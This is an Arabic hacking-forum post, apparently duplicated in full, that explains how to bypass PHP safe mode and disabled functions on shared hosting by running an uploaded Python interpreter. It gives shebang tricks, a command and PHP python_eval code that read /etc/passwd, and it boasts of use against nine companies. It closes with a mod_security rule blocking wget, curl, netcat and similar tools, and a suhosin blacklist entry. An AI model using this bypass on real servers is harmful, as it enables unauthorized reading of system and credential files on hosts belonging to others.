admin
11-02-2013, بتوقيت غرينيتش 01:38 AM
السلأم عليكم ورحمة الله وبركاتهَ ..
شخباركم شباب ..
كلنا سمعنا زمان عن الباثيون وخطورته ..
ومثل ماحنى عارفين ثغرات الـ perl بدت بـ الانقراضَ والحمد لله اكثر الشركات هنا تم التجريب جميع ثغرات البيرل وبادت بالفشلَ
وقدرت اتخطى بـ الباثيون وقرائة الملفات بشكل مباشر بدون السيملنك ولا غيره ، قرائه مباشرهَ
علماَ اللي يقول انا مو مثبت باثيون بـ سيرفر SERVER بسيطه ، يستطيع المخترق رفع مترجم خاص فيهَ
وتعددت الطرق ولكن هنا الحل بـ اذن الله ، جربته على كم سيرفر SERVER عندي وفعال 100 % بـ اذن اللهَ
يستطيع المخترق تشغيل الباثيون عن طريق المسار الافتراضي
رمز PHP:
<code style="white-space:nowrap"> <code> #!/usr/bin/python
</code> </code>
ان لم نصب الباثيون يستطيع تشغيل الشل والقرائه عن طريق : -
+ رمز PHP:
<code style="white-space:nowrap"> <code> #!python -w -I/home/meshal/public_html/meshal/meshal.py
</code> </code>
نستنتج من الكلمه باللون الاحمر انه رفع مترجم على نفس الملف وتشغيل بكل سهولهَ وهذي طريقتي الخاصه ولـ عيونكم ننزله http://www.dzbatna.com/images/smilies/blushing.gif
يستطيع المخترق تشغيل ملفاته عن طريق استخدام الاوامر بهذا الشكل
رمز PHP:
<code style="white-space:nowrap"> <code> python meshal.py cat /etc/passwd
</code> </code>
او يستطيع تشغيلها من ملف php
رمز PHP:
<code style="white-space:nowrap"> <code> $code= python_eval
('
import os
pwd = os.getcwd()
print pwd
os.system('cat /etc/passwd')
');
</code> </code>
بعض الملعومآت عن الثغره ، :-
1) تخطي تعطيل الدوآل ، في حالة كان الـSafe mode = off .
2) تخطي الـ Safe Mode على اكبر ، السيرفر SERVERات .
3) تخطي ، صحفات Forbidden و Internal Error عند تشغيل ، ملفات البــايثون .
4) ماتحتاج ملف .htaccess او أي اضافات خارجيه : فقط المترجم ، ( عكس البيرل )
5) لاتعتمد على دوال الـ PHP ابداً ،
طولنآ عليكمَ بس حبيت اوضح ، مدى خطورهآ لأني شفت ، خطورتهآ بـ نفسي ، بـ العربي ( 9 شركات هنا جربتهآ عليهم وشغاله 100 % ) http://www.dzbatna.com/images/smilies/nosweat.gif
الترقيعَ بسيط جداً وجربته ، بـ نفسيَ
1) أضافة بـ المود سكيورتيَ
رمز PHP:
<code style="white-space:nowrap"> <code> SecRule REQUEST_URI|REQUEST_BODY "(cmd|command)=(cd|\;|perl |killall |[COLOR="Red"]python[/COLOR] |rpm |yum |apt-get |emerge |lynx |links |mkdir |elinks |cmd|pwd|wget |lwp-(download|request|mirror|rget) |id|uname|cvs |svn |(s|r)(cp|sh) |net(stat|cat) |rexec |smbclient |t?ftp |ncftp |curl |telnet |gcc |cc |g\+\+ |whoami|\./|killall |rm \-[a-z|A-Z])"
</code> </code>
2) وضع دالة بالبلاك لست بـ برنامج suhosin
رمز PHP:
<code style="white-space:nowrap"> <code> python_eval
</code> </code>
طريقةالترقيع قعدت 3 ايامَ جربت كل الطرق العميقه بـ نواة الليونكس لـ منع الباثيون لكن ، باتت بـ الفشل لـ الاسف ، فـ جربت الطريقه هذي وتوقف عملهَ 100 %
إْنتهى ، اتمنى ، استفدتوآ من هـ الشرح طريقةَ وانشاء الله يكون وآفيَ .. وبالتوفيقَ http://www.dzbatna.com/images/smilies/icon30.gif
https://fbcdn-sphotos-d-a.akamaihd.net/hphotos-ak-ash4/482113_236967293114455_1193518507_n.png (http://www.dzbatna.com)
©المشاركات المنشورة تعبر عن وجهة نظر صاحبها فقط، ولا تُعبّر بأي شكل من الأشكال عن وجهة نظر إدارة المنتدى (http://www.dzbatna.com)©
شخباركم شباب ..
كلنا سمعنا زمان عن الباثيون وخطورته ..
ومثل ماحنى عارفين ثغرات الـ perl بدت بـ الانقراضَ والحمد لله اكثر الشركات هنا تم التجريب جميع ثغرات البيرل وبادت بالفشلَ
وقدرت اتخطى بـ الباثيون وقرائة الملفات بشكل مباشر بدون السيملنك ولا غيره ، قرائه مباشرهَ
علماَ اللي يقول انا مو مثبت باثيون بـ سيرفر SERVER بسيطه ، يستطيع المخترق رفع مترجم خاص فيهَ
وتعددت الطرق ولكن هنا الحل بـ اذن الله ، جربته على كم سيرفر SERVER عندي وفعال 100 % بـ اذن اللهَ
يستطيع المخترق تشغيل الباثيون عن طريق المسار الافتراضي
رمز PHP:
<code style="white-space:nowrap"> <code> #!/usr/bin/python
</code> </code>
ان لم نصب الباثيون يستطيع تشغيل الشل والقرائه عن طريق : -
+ رمز PHP:
<code style="white-space:nowrap"> <code> #!python -w -I/home/meshal/public_html/meshal/meshal.py
</code> </code>
نستنتج من الكلمه باللون الاحمر انه رفع مترجم على نفس الملف وتشغيل بكل سهولهَ وهذي طريقتي الخاصه ولـ عيونكم ننزله http://www.dzbatna.com/images/smilies/blushing.gif
يستطيع المخترق تشغيل ملفاته عن طريق استخدام الاوامر بهذا الشكل
رمز PHP:
<code style="white-space:nowrap"> <code> python meshal.py cat /etc/passwd
</code> </code>
او يستطيع تشغيلها من ملف php
رمز PHP:
<code style="white-space:nowrap"> <code> $code= python_eval
('
import os
pwd = os.getcwd()
print pwd
os.system('cat /etc/passwd')
');
</code> </code>
بعض الملعومآت عن الثغره ، :-
1) تخطي تعطيل الدوآل ، في حالة كان الـSafe mode = off .
2) تخطي الـ Safe Mode على اكبر ، السيرفر SERVERات .
3) تخطي ، صحفات Forbidden و Internal Error عند تشغيل ، ملفات البــايثون .
4) ماتحتاج ملف .htaccess او أي اضافات خارجيه : فقط المترجم ، ( عكس البيرل )
5) لاتعتمد على دوال الـ PHP ابداً ،
طولنآ عليكمَ بس حبيت اوضح ، مدى خطورهآ لأني شفت ، خطورتهآ بـ نفسي ، بـ العربي ( 9 شركات هنا جربتهآ عليهم وشغاله 100 % ) http://www.dzbatna.com/images/smilies/nosweat.gif
الترقيعَ بسيط جداً وجربته ، بـ نفسيَ
1) أضافة بـ المود سكيورتيَ
رمز PHP:
<code style="white-space:nowrap"> <code> SecRule REQUEST_URI|REQUEST_BODY "(cmd|command)=(cd|\;|perl |killall |[COLOR="Red"]python[/COLOR] |rpm |yum |apt-get |emerge |lynx |links |mkdir |elinks |cmd|pwd|wget |lwp-(download|request|mirror|rget) |id|uname|cvs |svn |(s|r)(cp|sh) |net(stat|cat) |rexec |smbclient |t?ftp |ncftp |curl |telnet |gcc |cc |g\+\+ |whoami|\./|killall |rm \-[a-z|A-Z])"
</code> </code>
2) وضع دالة بالبلاك لست بـ برنامج suhosin
رمز PHP:
<code style="white-space:nowrap"> <code> python_eval
</code> </code>
طريقةالترقيع قعدت 3 ايامَ جربت كل الطرق العميقه بـ نواة الليونكس لـ منع الباثيون لكن ، باتت بـ الفشل لـ الاسف ، فـ جربت الطريقه هذي وتوقف عملهَ 100 %
إْنتهى ، اتمنى ، استفدتوآ من هـ الشرح طريقةَ وانشاء الله يكون وآفيَ .. وبالتوفيقَ http://www.dzbatna.com/images/smilies/icon30.gif
https://fbcdn-sphotos-d-a.akamaihd.net/hphotos-ak-ash4/482113_236967293114455_1193518507_n.png (http://www.dzbatna.com)
©المشاركات المنشورة تعبر عن وجهة نظر صاحبها فقط، ولا تُعبّر بأي شكل من الأشكال عن وجهة نظر إدارة المنتدى (http://www.dzbatna.com)©